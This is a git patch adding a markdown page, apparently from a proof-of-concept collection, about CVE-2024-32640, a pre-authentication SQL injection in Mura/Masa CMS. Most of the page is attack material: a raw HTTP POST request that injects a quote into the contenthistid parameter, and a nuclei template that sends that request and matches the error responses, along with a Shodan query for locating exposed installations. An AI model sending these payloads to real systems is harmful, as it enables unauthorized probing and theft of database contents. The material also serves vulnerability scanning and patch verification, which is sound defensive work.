From 0a6846b175ee701c901ccf66c48a7af62ae6e0ff Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 9 May 2024 19:21:29 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Mura-CMS-processAsyncObject=E5=AD=98?= =?UTF-8?q?=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E(CVE-2024-32640?= =?UTF-8?q?).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ncObject存在SQL注入漏洞(CVE-2024-32640).md | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640).md diff --git a/Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640).md b/Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640).md new file mode 100644 index 0000000..f153151 --- /dev/null +++ b/Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640).md @@ -0,0 +1,56 @@ +## Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640) + +Mura CMS 是一个功能全面、灵活且用户友好的内容管理系统。2024年5月8日,互联网上披露其存在CVE-2024-32640 Mura CMS processAsyncObject SQL注入漏洞,攻击者可构造恶意请求获取数据库中的敏感信息。 + +## poc +``` + POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1 + Host: {{Hostname}} +Content-Type: application/x-www-form-urlencoded + +object=displayregion&contenthistid=x\'&previewid=1 +``` + +## nuclei +``` +id: CVE-2024-32640 + +info: + name: Mura/Masa CMS - SQL Injection + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + The Mura/Masa CMS is vulnerable to SQL Injection. + reference: + - https://blog.projectdiscovery.io/mura-masa-cms-pre-auth-sql-injection/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32640 + impact: | + Successful exploitation could lead to unauthorized access to sensitive data. + remediation: | + Apply the vendor-supplied patch or update to a secure version. + metadata: + verified: true + max-request: 3 + vendor: masacms + product: masacms + shodan-query: 'Generator: Masa CMS' + tags: cve,cve2022,sqli,cms,masa,masacms + +http: + - raw: + - | + POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + object=displayregion&contenthistid=x\'&previewid=1 + + matchers: + - type: dsl + dsl: + - 'status_code == 500' + - 'contains(header, "application/json")' + - 'contains_all(body, "Unhandled Exception")' + - 'contains_all(header,"cfid","cftoken")' + condition: and +```